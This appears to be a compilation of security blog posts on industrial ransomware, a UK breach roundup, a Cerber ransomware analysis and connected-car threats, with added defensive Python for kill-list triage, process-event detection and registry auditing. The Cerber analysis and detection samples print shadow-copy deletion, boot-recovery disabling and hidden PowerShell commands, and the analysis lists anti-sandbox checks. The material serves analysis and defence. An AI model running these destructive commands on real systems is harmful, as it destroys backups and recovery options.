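        The triage the post describes for SNAKEHOSE, LockerGoga and MegaCortex (extracting the kill list, diffing it across families, and spotting the "proficyclient.exe4" typo) is routine analyst work that can be scripted. The following is an added example (not code from the original post or any sample) that parses two constructed kill-list excerpts written in the batch-script style the post mentions, diffs them, flags malformed image names and matches entries against an OT watchlist. Only "proficyclient.exe" comes from the post; every other process and service name is a constructed placeholder, and the OT keyword list is an assumption to be replaced with names from your own asset inventory.

```python
"""Triage ransomware process kill lists: parse, diff, and flag OT-related entries.

Added example, not code from the original post. The two kill-list excerpts are
constructed in the style of a batch script; 'proficyclient.exe' is the name the
post discusses, all other names are placeholders. OT_KEYWORDS is an assumed
watchlist; populate it from the software actually present in your OT network.
"""
import re

KILL_LIST_A = """\
taskkill /IM proficyclient.exe4 /F
taskkill /IM sqlservr.exe /F
taskkill /IM otvendor_hmi.exe /F
net stop "Backup Service" /y
"""

KILL_LIST_B = """\
taskkill /IM proficyclient.exe /F
taskkill /IM sqlservr.exe /F
taskkill /IM otvendor_hmi.exe /F
taskkill /IM historian_collector.exe /F
"""

OT_KEYWORDS = ("proficy", "hmi", "historian")   # assumed watchlist, lower-case substrings

TASKKILL = re.compile(r'taskkill\s+/IM\s+"?([^\s"]+)"?', re.IGNORECASE)
NET_STOP = re.compile(r'net\s+stop\s+"?([^"/]+?)"?\s*(?:/y)?\s*$', re.IGNORECASE)
VALID_IMAGE = re.compile(r'^[\w.\-]+\.exe$')   # a well-formed image name ends in .exe


def extract_targets(script):
    """Return (process_images, service_names) named by taskkill / net stop lines."""
    procs, services = [], []
    for line in script.splitlines():
        m = TASKKILL.search(line)
        if m:
            procs.append(m.group(1).lower())
            continue
        m = NET_STOP.search(line)
        if m:
            services.append(m.group(1).strip().lower())
    return procs, services


def malformed_entries(procs):
    """Entries that can never match a running image (e.g. a trailing typo character)."""
    return [p for p in procs if not VALID_IMAGE.match(p)]


def ot_related(procs):
    """Entries whose name contains an OT watchlist keyword."""
    return [p for p in procs if any(k in p for k in OT_KEYWORDS)]


def compare_lists(script_a, script_b):
    """Set difference of process targets between two kill lists."""
    a, _ = extract_targets(script_a)
    b, _ = extract_targets(script_b)
    return {
        "only_in_a": sorted(set(a) - set(b)),
        "only_in_b": sorted(set(b) - set(a)),
        "shared": sorted(set(a) & set(b)),
    }


if __name__ == "__main__":
    procs, services = extract_targets(KILL_LIST_A)
    print("malformed:", malformed_entries(procs))
    print("OT-related:", ot_related(procs))
    print("diff:", compare_lists(KILL_LIST_A, KILL_LIST_B))
```

        A malformed entry such as "proficyclient.exe4" is worth recording precisely because it is inert: it reveals copying between authors without changing what the malware can stop. The watchlist match is the defender's real output, since each OT-related hit names a process whose host should be assessed for segmentation and backup coverage.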

        Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

        As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

        The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

        Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

        As recently as February 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

        Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

        Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

        For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

        • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
        • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
        • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
        • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
        • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
        • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
        • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
        • Note that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

        Cyber Security Roundup for February 2020

        A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

        After years of dither and delay the UK government finally nailed its colours to the mast, no, not on Brexit but on Huawei, permitting 'limited use' of the Chinese telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary: either it's a clever compromise or a complete sell-out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is performing a delicate balancing act to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and the United States. An outright US-style ban on Huawei would seriously jeopardise billions of pounds worth of Chinese investment in the UK economy. On the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high-risk network providers on the use of Huawei tech.
        UK Gov agrees to 'limited' Huawei involvement within UK 5G

        UK business-targeted ransomware continues to rear its ugly head in 2020; this time global foreign exchange firm Travelex's operations were brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included their UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsbury's, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently previously detected and warned Travelex about many months earlier. There could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and had also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached; however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

        The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what was described by German automotive parts supplier Gedia Automotive Group as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched their VPN server on 4th January.

        Leeds-based medical tech company Tissue Regenix halted its US manufacturing operation after an unauthorised party accessed its IT systems. To date there have been no details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following its cyber attack disclosure.

        London-based marine consultancy company LOC was hacked and held to ransom by cybercriminals. It was reported that computers were 'locked' and 300Gb of company data was stolen by a criminal group; investigations into this hack are still ongoing.

        It seems every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of the leading global cloud providers, Microsoft, to be caught out by such a schoolboy error. Microsoft reported a database misconfiguration of their Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties accessed any of the leaked data.

        Cyber attacks against the UK defence industry hit unprecedented highs according to government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in the first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

        It was another fairly busy month for Microsoft patches, including an NSA-revealed critical flaw in Windows 10. January also saw the end of security update support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

        According to a World Economic Forum (WEF) study, most of the world's airports' cybersecurity is not up to scratch. WEF reported 97 of the world's 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. The summary findings were:

        • 97% of the websites contain outdated web software.
        • 24% of the websites contain known and exploitable vulnerabilities.
        • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
        • 100% of the mobile apps contain at least five external software frameworks.
        • 100% of the mobile apps contain at least two vulnerabilities.

        Elsewhere in the world, it was reported a US Department of Defense contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry's advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of Super Bowl LIV, Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, saying it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And ransomware took a US maritime base offline for 30 hours.

        The Dallas County Attorney finally applied some common sense, dropping charges against two Coalfire red teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said that upon arrest the two men stated “they were contracted to break into the building for Iowa courts to check the security of the building”. After the charges were dropped at the end of January, Coalfire CEO Tom McAndrew said, “With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement”, adding, “We’re grateful to the global security community for their support throughout this experience.”

        Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

        Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

        On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

        Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

        FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

        Attack Process

        The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

        1. Target receives and opens a Word document.
        2. Macro in document is invoked to run PowerShell in hidden mode.
        3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
        4. On successful connection, the ransomware is written to the disk of the victim.
        5. PowerShell executes the ransomware.
        6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
        7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
        8. Files are encrypted and messages are presented to the user requesting payment.

        Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

        The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

        PowerShell Abuse

        When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

        Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

        It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

        In this case we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

        Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

        Cerber in Action

        Initial payload behavior

        Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

        If the malware is not launched from the specific aforementioned folder, then after eliminating any blacklisted filenames from an internal list, the malware creates a renamed copy of itself in “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. It then executes the copy from the new location and cleans up after itself.

        Shadow deletion

        As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes with the respective arguments:

        Vssadmin.exe "delete shadows /all /quiet"

        WMIC.exe "shadowcopy delete"

        Bcdedit.exe "/set {default} recoveryenabled no"

        Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
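
        As an added detection example (not FireEye's code and not part of the original post), the Python below flags the macro-to-PowerShell launch described under PowerShell Abuse together with the shadow-copy and boot-recovery commands listed above, run over constructed Sysmon-style process-creation events. The file paths, the user name, the profilest.exe location in %APPDATA% and the placeholder encoded command are assumptions.

```python
"""Flag the Cerber launch chain and shadow-copy deletion in process-creation events.

Added example, not FireEye's code. Each event is a (ParentImage, Image, CommandLine)
triple as logged by Sysmon Event ID 1; the samples below are constructed to mirror
steps 2-7 of the attack cycle, not captured from a real host.
"""
import re
from typing import List, Tuple

Event = Tuple[str, str, str]  # (parent image path, image path, command line)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

# Command-line rules, matched against the lower-cased command line.
RULES = [
    # hidden window, bypassed execution policy or encoded command (steps 2-3)
    ("powershell_hidden_or_bypass", re.compile(
        r"powershell(\.exe)?\s.*(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-e(nc|ncodedcommand)?\s)")),
    # vssadmin / WMIC shadow copy removal (step 7)
    ("shadow_copy_deletion", re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete")),
    # bcdedit disabling recovery mode and boot-failure prompts (step 7)
    ("boot_recovery_tampering", re.compile(
        r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
]


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) pairs for every rule an event triggers."""
    hits = []
    for i, (parent_path, image_path, cmd) in enumerate(events):
        parent = parent_path.lower().rsplit("\\", 1)[-1]
        image = image_path.lower().rsplit("\\", 1)[-1]
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            hits.append((i, "office_spawns_script_host"))       # step 2
        if parent in SCRIPT_HOSTS and "\\appdata\\" in image_path.lower():
            hits.append((i, "script_host_runs_appdata_exe"))    # steps 4-5
        hits.extend((i, name) for name, rx in RULES if rx.search(cmd.lower()))
    return hits


def looks_like_cerber_chain(hits: List[Tuple[int, str]]) -> bool:
    """True when both the document launch stage and the backup-destruction stage appear."""
    names = {name for _, name in hits}
    return "office_spawns_script_host" in names and "shadow_copy_deletion" in names


# Constructed sample: a benign document open, the Cerber chain, then a benign vssadmin call.
WORD = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = r"C:\Users\alice\AppData\Roaming\profilest.exe"
SAMPLE_EVENTS: List[Event] = [
    (r"C:\Windows\explorer.exe", WORD, r'"WINWORD.EXE" /n C:\Users\alice\Downloads\invoice.doc'),
    (WORD, PS, "powershell.exe -w hidden -ep bypass -enc BASE64PLACEHOLDER"),
    (PS, PAYLOAD, PAYLOAD),
    (PAYLOAD, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    (PAYLOAD, r"C:\Windows\System32\wbem\WMIC.exe", "WMIC.exe shadowcopy delete"),
    (PAYLOAD, r"C:\Windows\System32\bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled no"),
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
]
```

The benign `vssadmin list shadows` event and the plain document open produce no hits, which is the distinction a rule like this needs to keep false positives down.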

        Coercion

        People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

        Figure 2. A message to the victim after encryption

        The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.


        Figure 3. Ransom offered to victim, which is discounted for five days

        Multilingual Support

        As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

        Figure 4. Interface provided to the victim to pay ransom supports 12 languages

        Encryption

        Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

        Selective Targeting

        Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

        The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers' geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

        Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

        Anti VM Checks

        The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

        Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

        Persistence

        Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

        • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
        • The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware will be launched each time the Windows command interpreter, “cmd.exe”, is launched.
        • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
        • Common persistence methods such as the Run and RunOnce keys are also used.
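
        The registry entries above can be audited offline from `reg query` output. The Python below is an added example (not FireEye's code) that parses constructed output and flags the Command Processor AutoRun, the screensaver value and Run/RunOnce values pointing into %APPDATA%\<GUID>; the GUID, user name and the charmap.exe filename are constructed, and the startup-folder .lnk is a filesystem check it does not cover.

```python
r"""Audit `reg query` output for the Cerber persistence entries listed above.

Added example, not FireEye's code. It parses the text that `reg query <key> /s`
prints and assumes the payload lives in %APPDATA%\<GUID>, as the post describes.
The sample output and the GUID in it are constructed, not captured.
"""
import re
from typing import List, Tuple

Entry = Tuple[str, str, str]  # (registry key, value name, data)

VALUE_LINE = re.compile(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*?)\s*$")
# %APPDATA%\<GUID>\ as a path fragment, with or without the surrounding braces
GUID_DIR = re.compile(r"\\appdata\\roaming\\\{?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?\\", re.I)


def parse_reg_query(text: str) -> List[Entry]:
    """Turn `reg query` output into (key, name, data) triples."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):          # key header lines are not indented
            key = line.strip()
        elif key and line.strip():
            m = VALUE_LINE.match(line)
            if m:
                entries.append((key, m.group(1), m.group(3)))
    return entries


def audit(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """Return (key, value name, reason) for entries matching the Cerber persistence set."""
    findings = []
    for key, name, data in entries:
        k, n, d = key.lower(), name.lower(), data.lower()
        if k.endswith("\\command processor") and n == "autorun":
            # Normally absent; Cerber points it at the payload so every cmd.exe start relaunches it
            findings.append((key, name, "Command Processor AutoRun is set"))
        elif k.endswith("\\control panel\\desktop") and n == "scrnsave.exe":
            if "\\windows\\system32\\" not in d:   # legitimate .scr files live in System32
                findings.append((key, name, "screensaver points outside System32"))
        elif re.search(r"\\currentversion\\run(once)?$", k) and GUID_DIR.search(d):
            findings.append((key, name, "Run/RunOnce launches an executable from %APPDATA%\\<GUID>"))
    return findings


# Constructed sample; charmap.exe stands in for the System32 name Cerber picks at random.
PAYLOAD = r"C:\Users\alice\AppData\Roaming\{5c2e8d1a-7f3b-4e9c-9a10-2d4b6e8f0a1c}\charmap.exe"
SAMPLE_REG_QUERY = rf"""
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
    AutoRun    REG_SZ    {PAYLOAD}

HKEY_CURRENT_USER\Control Panel\Desktop
    SCRNSAVE.EXE    REG_SZ    {PAYLOAD}
    Wallpaper    REG_SZ    C:\Users\alice\Pictures\beach.jpg

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    charmap    REG_SZ    {PAYLOAD}

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
    charmap    REG_SZ    {PAYLOAD}
"""
```

The legitimate OneDrive Run entry under AppData\Local is deliberately left unflagged: matching on the GUID-named folder, not merely on AppData, is what keeps the check usable on real hosts.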

        A Solid Defense

        Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

        Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

        Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

        FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

        Conclusion

        Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

        Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

        HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

        Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step further and contact relevant authorities to bring down these types of campaigns.

        Click here for more information about Exploit Guard technology.

        Connected Cars: The Open Road for Hackers

        As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

        Car Hacking?

        Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

        Ransomware

        The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make vehicles attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

        For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

        Malicious C2 and Final Hop Points

        One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

        Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

        Understanding the Risk Landscape

        The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

        These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

        FireEye Capabilities

